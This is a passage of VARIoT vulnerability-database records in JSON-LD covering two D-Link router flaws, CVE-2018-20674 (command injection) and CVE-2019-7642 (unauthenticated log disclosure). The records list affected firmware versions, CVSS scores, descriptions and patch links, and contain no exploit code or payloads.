"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.22b02"
},
{
"model": "dir-822-us",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.10b06"
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.20b01"
},
{
"model": "dir-880l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.07.b08"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.21b07"
},
{
"model": "dir-822",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.10b06"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.21b01"
},
{
"model": "dir-822",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "3.11b01beta"
},
{
"model": "dir-822-us",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "3.11b01beta"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.21b08beta"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "2.22b03beta"
},
{
"model": "dir-880l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.20b02beta"
},
{
"model": "dir-850l b* \u003cv2.22b03beta",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-822 c1 \u003cv3.11b01beta",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-822-us c1 \u003cv3.11b01beta",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l a* \u003cv1.21b08beta",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l a* \u003cv1.20b02beta",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "NVD",
"id": "CVE-2018-20674"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.10b06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-822-us_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.10b06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-822-us:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21b07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.21b01",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:2.22b02:beta:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.07.b08",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:1.20b01:beta:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-20674"
}
]
},
"cve": "CVE-2018-20674",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-20674",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-01715",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-131504",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-20674",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-20674",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-01715",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201901-139",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-131504",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "VULHUB",
"id": "VHN-131504"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "NVD",
"id": "CVE-2018-20674"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Product devices contain a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-822C1 and others are all wireless router products of D-Link. A command execution vulnerability exists in several D-Link products that can be exploited by remote attackers to execute commands. D-Link DIR-822 C1, etc. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A with firmware prior to v1.21B08Beta *; DIR-850L B* with firmware prior to v2.22B03Beta; DIR-880L A* with firmware prior to v1.20B02Beta",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "VULHUB",
"id": "VHN-131504"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-20674",
"trust": 3.1
},
{
"db": "DLINK",
"id": "SAP10101",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201901-139",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-01715",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-131504",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "VULHUB",
"id": "VHN-131504"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "NVD",
"id": "CVE-2018-20674"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
]
},
"id": "VAR-201901-1554",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "VULHUB",
"id": "VHN-131504"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
}
]
},
"last_update_date": "2023-12-18T12:50:26.588000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L Rev. Ax/Bx, DIR-880L Rev.Ax, DIR-822 Rev. Cx :: Authenticated Command Bypass \u0026 Authenticated Remote Command Execution (RCE)",
"trust": 0.8,
"url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
},
{
"title": "Patches for multiple D-Link product command execution vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/150341"
},
{
"title": "Multiple D-Link Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=88327"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-131504"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "NVD",
"id": "CVE-2018-20674"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20674"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20674"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "VULHUB",
"id": "VHN-131504"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "NVD",
"id": "CVE-2018-20674"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"db": "VULHUB",
"id": "VHN-131504"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"db": "NVD",
"id": "CVE-2018-20674"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"date": "2019-01-09T00:00:00",
"db": "VULHUB",
"id": "VHN-131504"
},
{
"date": "2019-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"date": "2019-01-09T00:29:00.210000",
"db": "NVD",
"id": "CVE-2018-20674"
},
{
"date": "2019-01-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-01715"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-131504"
},
{
"date": "2019-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013972"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-20674"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Command injection vulnerability in product devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013972"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-139"
}
],
"trust": 0.6
}
}
VAR-201903-0482
Vulnerability from variot - Updated: 2023-12-18 12:43D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10). plural D-Link The product contains authentication vulnerabilities.Information may be obtained. D-Link is a company specializing in the design and development of computer network equipment. D-LinkDIR-817LW is a wireless router from D-Link of Taiwan, China. An information disclosure vulnerability exists in the D-Link router. D-Link DIR-817LW, etc. The following products are affected: D-Link DIR-817LW (A1-1.04); DIR-816L (B1-2.06); DIR-816 (B1-2.06); DIR-850L (A1-1.09); 1.10)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0482",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10"
},
{
"model": "dir-816",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.06"
},
{
"model": "dir-816l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.06"
},
{
"model": "dir-817lw",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04"
},
{
"model": "dir-816",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-816l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-817lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-817lw a1-1.04",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-817lw_firmware:1.04:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-817lw:a1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-816l:b1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-816_firmware:2.06:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-816:b1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:1.09:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:a1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-868l_firmware:1.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-868l:a1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"cve": "CVE-2019-7642",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7642",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-23343",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-159077",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7642",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7642",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-23343",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-926",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-159077",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7642",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
